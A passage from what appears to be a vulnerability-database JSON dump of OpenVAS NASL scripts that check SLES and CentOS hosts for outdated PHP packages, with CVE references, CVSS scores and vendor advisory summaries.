script_name(\"SLES10: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mhash\", rpm:\"php5-mhash~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-26T08:55:29", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65637", "id": "OPENVAS:65637", "title": "SLES11: Security update for PHP5", "type": "openvas", "sourceData": "#\n#VID d121477dd9cc7bfeaa1d7d8a6d824fa0\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-hash\n php5-iconv\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mysql\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xmlwriter\n php5-xsl\n php5-zip\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=480948\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=471419\");\n script_id(65637);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES11: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:55:39", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880938", "id": "OPENVAS:880938", "title": "CentOS Update for php CESA-2009:0337 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2009:0337 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Web server.\n\n A heap-based buffer overflow flaw was found in PHP's mbstring extension. A\n remote attacker able to pass arbitrary input to a PHP script using mbstring\n conversion functions could cause the PHP interpreter to crash or,\n possibly, execute arbitrary code. (CVE-2008-5557)\n \n A flaw was found in the handling of the "mbstring.func_overload"\n configuration setting. A value set for one virtual host, or in a user's\n .htaccess file, was incorrectly applied to other virtual hosts on the same\n server, causing the handling of multibyte character strings to not work\n correctly. (CVE-2009-0754)\n \n A buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\n script allowed a remote attacker to load a carefully crafted font file, it\n could cause the PHP interpreter to crash or, possibly, execute arbitrary\n code. (CVE-2008-3658)\n \n A flaw was found in the way PHP handled certain file extensions when\n running in FastCGI mode. If the PHP interpreter was being executed via\n FastCGI, a remote attacker could create a request which would cause the PHP\n interpreter to crash. (CVE-2008-3660)\n \n A memory disclosure flaw was found in the PHP gd extension's imagerotate\n function. A remote attacker able to pass arbitrary values as the\n "background color" argument of the function could, possibly, view portions\n of the PHP interpreter's memory. (CVE-2008-5498)\n \n All php users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. The httpd web server\n must be restarted for the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-April/015806.html\");\n script_id(880938);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:0337\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_name(\"CentOS Update for php CESA-2009:0337 centos4 i386\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:49", "bulletinFamily": "scanner", "description": "The remote host is missing updates to php announced in\nadvisory CESA-2009:0337.", "modified": "2018-04-06T00:00:00", "published": "2009-04-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063827", "id": "OPENVAS:136141256231063827", "title": "CentOS Security Advisory CESA-2009:0337 (php)", "type": "openvas", "sourceData": "#CESA-2009:0337 63827 8\n# $Id: ovcesa2009_0337.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:0337 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on 